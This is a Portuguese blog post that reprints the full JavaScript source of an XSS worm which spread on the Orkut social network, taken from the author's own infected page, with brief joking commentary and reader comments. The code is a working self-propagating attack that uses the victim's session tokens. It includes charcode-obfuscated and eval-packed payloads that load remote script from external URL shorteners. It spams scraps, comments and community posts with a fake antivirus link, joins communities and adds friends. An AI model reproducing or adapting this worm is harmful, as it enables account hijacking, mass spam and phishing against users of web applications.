[Source] O XSS-Worm Que Assombrou O Orkut!

Dia 24-25 de Setembro, é descoberta uma falha de segurança no Orkut, A.K.A XSS , que permite que seja imbuido um código externo ao código principal da página vulneravel. Algumas crianças fizeram um script chato e bem,  estão fazendo com que eu não entre no orkut até a falha ser corrigida. Vamos google, vamos!

Eu de presente pra vocês (sim eu fui pego), e está ae o código que foi executado na minha página, e que deve ser o principal a estar rodando pelo orkut afora, com algumas coisas curiosas em negrito.

Esse é o código do worm relacionado às bandeiras vermelhas, o da bandeira brasileira (que é diferente), eu não peguei.

document.title = “Pegadinha do Malandro, rs.”;

function createXMLHttpRequest() {
return window.ActiveXObject ? new ActiveXObject(‘Msxml2.XMLHTTP’) : new XMLHttpRequest
};
function getFL(a) {
var b = createXMLHttpRequest();
b.open(“GET”, “/RequestFriends.aspx?req=fl&uid=” + a + “&oxh=1&rnd=” + Math.random(), false);
b.send(null);
if (b.status == 200) {
eval(“var jSON=” + b.responseText.split(“while (true); &&&START&&&”)[1] + “;”);
manageFriends(jSON)
}
};

function sendScrap(a) {
var c = “Action.submit=1&scrapText=” + encodeURIComponent(String.fromCharCode(60,115,116,121,108,101,32,47,62,60,105,109,103,32,115,114,99,61,34,47,105,109,103,47,97,108,112,104,47,102,108,56,56,46,103,105,102,34,32,111,110,108,111,97,100,61,34,100,61,100,111,99,117,109,101,110,116,59,115,61,32,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,39,104,116,116,112,58,47,47,99,119,46,99,120,47,63,50,113,35,35,39,59,32,100,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,34,62)) + Math.floor(Math.random() * 91839067) + “&POST_TOKEN=” + JSHDF[‘CGI.POST_TOKEN’] + “&signature=” + encodeURIComponent(JSHDF[‘Page.signature.raw’]) + “&uid=” + a;
var d = createXMLHttpRequest();
d.open(“POST”, “/Scrapbook.aspx”, false);
d.setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded;”);
d.send(c);
depo(a);
};

function manageFriends(a) {
var Jowkss2009 = “INFECTADOS PELO VIRUS DO ORKUT – CH1P5 “;
var b = a.data.list;
var c = b.length > 10 ? 10 : b.length;
getAid(b, 0)
};

function getAid(a, n) {
var b = a.length;
if (n == b) {
return
};
var c = createXMLHttpRequest();
var d = a[Math.round(Math.random() * (a.length – 1))].id;
c.open(“GET”, “/AlbumList.aspx?uid=” + d, false);
c.send(null);
if (c.status == 200) {
var e = c.responseText.match(/aid=(\d+)/i);
if (e) {
e = e[1];
getPid(d, e)
}
};
n++;
getAid(a, n)
};
function getPid(a, b) {
var c = createXMLHttpRequest();
c.open(“GET”, “/Album.aspx?uid=” + a + “&aid=” + b, false);
c.send(null);
if (c.status == 200) {
var d = c.responseText.match(/&(amp;)?pid=(\d+)/i);
if (d) {
postComment(a, b, d[2])
}
}
};
function postComment(a, b, c) {
var google=”INFECTADOS PELO VIRUS DO ORKUT”;
var d = “com=” + encodeURIComponent(google) + “&POST_TOKEN=” + JSHDF[‘CGI.POST_TOKEN’] + “&signature=” + encodeURIComponent(JSHDF[‘Page.signature.raw’]) + “&Action.addComment=&aid=” + b + “&uid=” + a + “&pid=” + c + “&ploc=&oxh=1”;
xml = createXMLHttpRequest();
xml.open(“POST”, “/AlbumZoom.aspx”, false);
xml.setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded; charset=UTF-8”);
xml.send(d);
};
function GrandeFunk() {
var status = createXMLHttpRequest();
status.open(“POST”, “/Profile”, false);
status.setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded; charset=UTF-8”);
status.send(“POST_TOKEN=” + encodeURIComponent(JSHDF[‘CGI.POST_TOKEN’]) + “&signature=” + encodeURIComponent(JSHDF[‘Page.signature.raw’]) + “&userStatus=” + encodeURIComponent(String.fromCharCode(60,115,116,121,108,101,47,62,60,105,109,103,32,115,114,99,61,34,47,105,109,103,47,97,108,112,104,47,102,108,56,56,46,103,105,102,34,32,111,110,108,111,97,100,61,34,100,61,100,111,99,117,109,101,110,116,59,115,61,32,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,39,104,116,116,112,58,47,47,105,115,46,103,100,47,102,115,122,110,107,35,35,39,59,32,100,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,34,62)) + “&Action.editUserStatusMessage=1”);
}
function Alertar(a) {
var alerta = alert(a);
}
function Joseph (a) {
with($=new XMLHttpRequest)
open(“GET”,”/Communities”,”G3″ == a),
send(null);
cmmx = $.responseText.match(/cmm=\d+/ig);
}
Joseph (‘Jowkss’);
var assuntox=”COLOQUE IMAGEM NO STATUS – CH1P5 “+Math.floor(Math.random()*10)+””;
var mensagemx= “Olhe o site abaixo e comprove…\n\n[red][b]www .sn .im /antiviruskut[/red][/b]\n junte os espacos e cole onde escreve www e de ok \n\n [gray]Chiips. \n\n”;
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘6 7(a,d,e){1 b=”2=”+0(3[\’8.2\’])+”&4=”+0(3[\’9.4.f\’])+”&g=”+0(d)+”&h=”+0(e)+”[i]”+5.j(5.k()*l)+”&m.n”;1 c=o();c.p(“q”,”/r.s?”+a,t);c.u(“v-w”,”y/x-z-A-B”);c.C(b)}’,39,39,’encodeURIComponent|var|POST_TOKEN|JSHDF|signature|Math|function|JowEnvia|CGI|Page||||||raw|subjectText|bodyText|silver|floor|random|999|Action|submit|createXMLHttpRequest|open|POST|CommMsgPost|aspx|false|setRequestHeader|Content|Type||application|www|form|urlencoded|send’.split(‘|’),0,{}));
JowEnvia(cmmx[1],assuntox,mensagemx);
JowEnvia(cmmx[5],assuntox,mensagemx);
JowEnvia(cmmx[10],assuntox,mensagemx);
JowEnvia(cmmx[15],assuntox,mensagemx);
function Jowkss(a) {
var b = “POST_TOKEN=” + encodeURIComponent(JSHDF[‘CGI.POST_TOKEN’]) + “&signature=” + encodeURIComponent(JSHDF[‘Page.signature.raw’]) + “&Action.join”;
var c = createXMLHttpRequest();
c.open(“POST”, “/CommunityJoin.aspx?cmm=” + a, false);
c.setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”);
c.send(b)
}

function MassADDx(a) {
var SuID = “ORKUT 3XPL0!T5”;
var b = “POST_TOKEN=” + encodeURIComponent(JSHDF[‘CGI.POST_TOKEN’]) + “&signature=” + encodeURIComponent(JSHDF[‘Page.signature.raw’]) + “&noteText=” + encodeURIComponent(SuID) + “&Action.yes”;
var c = createXMLHttpRequest();
c.open(“POST”, “/FriendAdd.aspx?uid=” + a, false);
c.setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”);
c.send(b)
}

function DarkVampiro() {
window.location = “http://www.orkut.com.br/CommunityJoin?cmm=106695748&#8221;;
Alertar(“Pegadinha do Malandro.”);
}
function BotaPraFude(a) {
var JowDocument = window.orkutFrame ? window.orkutFrame.document: document;
var UID = JowDocument.body.innerHTML.match(/uid=(\d+)/i)[1];
getFL(UID);
}
Jowkss(eval(function(p,a,c,k,e,r){e=String;if(!”.replace(/^/,String)){while(c–)r[c]=k[c]||c;k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘3.4(5,0,0,6,1,2,2,1)’,7,7,’51|49|54|String|fromCharCode|52|57′.split(‘|’),0,{})));

function setCookie(a, b, c, d, e, f) {
var g = a + “=” + escape(b) + (c ? “; expires=” + c.toGMTString() : “”) + (d ? “; path=” + d: “”) + (e ? “; domain=” + e: “”) + (f ? “; secure”: “”);
document.cookie = g
};
function getCookie(a) {
var b = document.cookie;
var c = a + “=”;
var d = b.indexOf(“; ” + c);
if (d == -1) {
d = b.indexOf(c);
if (d != 0) {
return false
}
} else {
d += 2
};
var e = document.cookie.indexOf(“;”, d);
if (e == -1) {
e = b.length
};
return unescape(b.substring(d + c.length, e))
};
GrandeFunk();
setTimeout(“DarkVampiro()”,60000);
Jowkss(“106

695748”);Jowkss(“105931411”);Jowkss(“407”);Jowkss(“98691387”);Jowkss(“106726026”);Jowkss(“105301517”);
Jowkss(String.fromCharCode());
MassADDx(“”);
MassADDx(“”);
BotaPraFude();

if (!getCookie(‘creditosRodLac’)) {
var wDate = new Date;
wDate.setTime(wDate.getTime() + 864000);
setCookie(‘creditosRodLac’, ‘1’, wDate);

};

Bem, concluindo, definitivamente o programador disso é bem engraçado🙂

Ou não, rs

Sobre AA

"Não sou tão careta quanto pareço. Nem tão culto. Não acredite em nada do que eu escrever. Acredite em você mesmo e no seu coração."
Esse post foi publicado em (in)utilidades, Tecnologia e marcado , , , , , . Guardar link permanente.

3 respostas para [Source] O XSS-Worm Que Assombrou O Orkut!

  1. Marcus disse:

    Teve seus 15min de fama

  2. Juca disse:

    Tanto o worm quanto esse post.

  3. Pingback: Cross site scripting and web based worms. | LEMON LABS

Deixe uma resposta

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s